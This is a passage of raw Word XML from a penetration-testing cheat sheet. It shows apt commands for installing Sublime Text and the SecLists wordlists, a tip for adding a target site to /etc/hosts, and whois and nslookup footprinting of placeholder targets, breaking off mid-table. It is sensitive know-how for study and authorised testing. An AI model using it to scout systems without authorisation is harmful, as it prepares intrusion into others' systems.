            <w:r w:rsidR="00AC3372" w:rsidRPr="00AC3372">
              <w:t>(All one command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B607B3E" w14:textId="10849629" w:rsidR="0066284A" w:rsidRDefault="0066284A" w:rsidP="0066284A">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get</w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>apt-transport-https</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529961DF" w14:textId="27A85818" w:rsidR="0066284A" w:rsidRDefault="0066284A" w:rsidP="0066284A">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>echo "</w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>deb https://download.sublimetext.com/ apt/stable/</w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> tee </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/etc/apt/sources.list.d/sublime-text.list</w:t>
            </w:r>
            <w:r w:rsidR="00AC3372">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AC3372">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AC3372">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AC3372" w:rsidRPr="00AC3372">
              <w:t>(All one command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="614C9C99" w14:textId="520B4D6E" w:rsidR="0066284A" w:rsidRDefault="0066284A" w:rsidP="0066284A">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="690E05AB" w14:textId="51F57EB9" w:rsidR="00F93CE3" w:rsidRDefault="0066284A" w:rsidP="0066284A">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>install</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0066284A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>sublime-text</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA768A" w14:paraId="024E582E" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="71349B2C" w14:textId="1B293101" w:rsidR="00DA768A" w:rsidRDefault="00DA768A" w:rsidP="00F93CE3">
            <w:r>
              <w:t>01.ff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0A31D79B" w14:textId="78942917" w:rsidR="00DA768A" w:rsidRDefault="00DA768A" w:rsidP="00F93CE3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>seclists</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00DA768A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(download and install seclists ready to have plenty of wordlists)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67F846C1" w14:textId="77777777" w:rsidR="00DA768A" w:rsidRDefault="00DA768A" w:rsidP="0066284A">
            <w:r>
              <w:t>Use this command to install seclists:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="496A5F97" w14:textId="099962AE" w:rsidR="003D1819" w:rsidRDefault="00DA768A" w:rsidP="0066284A">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003D1819" w:rsidRPr="003D1819">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidR="003D1819" w:rsidRPr="003D1819">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidR="003D1819" w:rsidRPr="003D1819">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35290916" w14:textId="07D34610" w:rsidR="00E61453" w:rsidRPr="00C17BAB" w:rsidRDefault="003D1819" w:rsidP="0066284A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA768A" w:rsidRPr="00DA768A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidR="00DA768A" w:rsidRPr="00DA768A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt</w:t>
            </w:r>
            <w:r w:rsidR="00DA768A" w:rsidRPr="00DA768A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DA768A" w:rsidRPr="00DA768A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidR="00DA768A" w:rsidRPr="00DA768A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>seclist</w:t>
            </w:r>
            <w:r w:rsidR="00C17BAB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00807096" w14:paraId="518CD87D" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6C250755" w14:textId="009EAB5B" w:rsidR="00807096" w:rsidRDefault="00807096" w:rsidP="00F93CE3">
            <w:r>
              <w:t>01.gg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="63972C95" w14:textId="7D2DCC88" w:rsidR="00807096" w:rsidRDefault="00807096" w:rsidP="00F93CE3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Adding IP Address to Local DNS</w:t>
            </w:r>
            <w:r w:rsidR="005C733E">
              <w:t>/DNS Lookup via the Hosts file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E9DE29A" w14:textId="4391D245" w:rsidR="00807096" w:rsidRPr="00807096" w:rsidRDefault="00807096" w:rsidP="0066284A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00807096">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve">IF YOU CANT’T SEEM TO ACCESS AN IP’S WEBSITE, OR NMAP GIVES YOU THE CLUE THAT… </w:t>
            </w:r>
            <w:r w:rsidRPr="00807096">
              <w:t>‘http-title: Did not follow redirect to http://</w:t>
            </w:r>
            <w:r w:rsidRPr="00807096">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGETWEBSITENAME.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00807096">
              <w:t xml:space="preserve">’ </w:t>
            </w:r>
            <w:r w:rsidRPr="00807096">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>THEN TRY MANUALLY SPECIFYING THE LINK BETWEEN THE IP ADDRESS AND WEBSITE ADDRESS BY ADDING A LOCAL DNS LOOKUP TO YOUR ‘HOSTS’ FILE.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2669E258" w14:textId="77777777" w:rsidR="00807096" w:rsidRDefault="00807096" w:rsidP="0066284A"/>
          <w:p w14:paraId="651B3EC1" w14:textId="77777777" w:rsidR="00807096" w:rsidRDefault="005C733E" w:rsidP="0066284A">
            <w:r>
              <w:t>This file can be found at /etc/hosts</w:t>
            </w:r>
            <w:r w:rsidR="001244FA">
              <w:t xml:space="preserve"> and by default only has two </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="001244FA">
              <w:t>IP’s</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="001244FA">
              <w:t>, both for the loopback address of 127.0.0.1 and 127.0.1.1.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77170427" w14:textId="77777777" w:rsidR="001244FA" w:rsidRDefault="001244FA" w:rsidP="0066284A">
            <w:r>
              <w:t>Add in here the IP address of the target website and the website domain name.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B9024C" w14:textId="77777777" w:rsidR="001244FA" w:rsidRDefault="001244FA" w:rsidP="0066284A"/>
          <w:p w14:paraId="39962EC4" w14:textId="480E76E7" w:rsidR="001244FA" w:rsidRDefault="001244FA" w:rsidP="0066284A">
            <w:r>
              <w:t>(Another clue might be that the URL bar of the site displays the domain name after you type in the IP address but returns a ‘Server Not Found’ error).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F93CE3" w14:paraId="00AB3346" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4D991B42" w14:textId="77777777" w:rsidR="00F93CE3" w:rsidRDefault="00F93CE3" w:rsidP="00F93CE3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="05B7900B" w14:textId="77777777" w:rsidR="00F93CE3" w:rsidRDefault="00F93CE3" w:rsidP="00F93CE3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E1D9A09" w14:textId="77777777" w:rsidR="00F93CE3" w:rsidRDefault="00F93CE3" w:rsidP="00F93CE3"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E4700CD" w14:textId="1D0C7BA3" w:rsidR="001B2315" w:rsidRDefault="001B2315">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC22A29" w14:textId="66C25C72" w:rsidR="009102F1" w:rsidRDefault="009102F1" w:rsidP="009102F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Footprinting: </w:t>
      </w:r>
      <w:r w:rsidRPr="009102F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whois</w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="00EB7273" w:rsidRPr="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004902E4" w:rsidRPr="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00EB7273">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> nslookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1098"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="2471"/>
        <w:gridCol w:w="7941"/>
      </w:tblGrid>
      <w:tr w:rsidR="009102F1" w14:paraId="270AA4D9" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5C80E184" w14:textId="7893568F" w:rsidR="009102F1" w:rsidRDefault="00500E0F" w:rsidP="0043739D">
            <w:r>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="009102F1">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="57586E27" w14:textId="434AD644" w:rsidR="009102F1" w:rsidRDefault="009102F1" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>whois</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(whois should be installed on Kali Linux by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7686A8E7" w14:textId="3D89787C" w:rsidR="009102F1" w:rsidRDefault="009102F1" w:rsidP="0043739D">
            <w:r>
              <w:t xml:space="preserve">The command </w:t>
            </w:r>
            <w:r w:rsidRPr="009102F1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">whois </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">is the CLI input needed to call the whois directory service via </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>a</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> RFC 3912 database.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009102F1" w14:paraId="1A26BA24" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5E62E748" w14:textId="2D99B6FD" w:rsidR="009102F1" w:rsidRDefault="00500E0F" w:rsidP="0043739D">
            <w:r>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="009102F1">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="134F95D1" w14:textId="77777777" w:rsidR="009102F1" w:rsidRDefault="009102F1" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="479825DF" w14:textId="5914ADBE" w:rsidR="009102F1" w:rsidRDefault="009102F1" w:rsidP="0043739D">
            <w:r>
              <w:t>Use whois command to learn more such as registrar information, hosting service, etc:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009102F1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">whois </w:t>
            </w:r>
            <w:r w:rsidRPr="009102F1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>(Or DNS name for the IP address)</w:t>
            </w:r>
            <w:r w:rsidR="00EB7273">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00EB7273">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EB7273" w:rsidRPr="00EB7273">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-H</w:t>
            </w:r>
            <w:r w:rsidR="00EB7273">
              <w:tab/>
              <w:t>Hide legal disclaimers</w:t>
            </w:r>
            <w:r w:rsidR="00EB7273">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EB7273">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EB7273" w:rsidRPr="00EB7273">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r w:rsidR="00EB7273">
              <w:tab/>
              <w:t>Specify a port number</w:t>
            </w:r>
            <w:r w:rsidR="00EB7273">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00EB7273">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EB7273" w:rsidRPr="00EB7273">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-a</w:t>
            </w:r>
            <w:r w:rsidR="00EB7273">
              <w:tab/>
              <w:t xml:space="preserve">Also search mirrored </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00EB7273">
              <w:t>db’s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EB7273">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EB7273" w:rsidRPr="00EB7273">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-I</w:t>
            </w:r>
            <w:r w:rsidR="00EB7273">
              <w:tab/>
              <w:t>Query IANA first</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F33328A" w14:textId="5F455686" w:rsidR="00EB7273" w:rsidRDefault="00EB7273" w:rsidP="0043739D">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EB7273">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--verbose</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Give more information in the scanning process output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76802" w14:paraId="01AA1155" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5ABFC108" w14:textId="14DD1F7E" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r>
              <w:t>11.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="095D3477" w14:textId="08F3CBB9" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nslookup</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(nslookup should be installed on Kali Linux by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51429502" w14:textId="2A02EE42" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r>
              <w:t xml:space="preserve">The command </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB7273">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nslookup </w:t>
            </w:r>
            <w:r>
              <w:t>will query internet name servers (interactive option too)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD18A9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nslookup </w:t>
            </w:r>
            <w:r w:rsidRPr="0069553B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>q=A</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD18A9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009102F1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>(Or DNS name for the IP address)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009102F1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
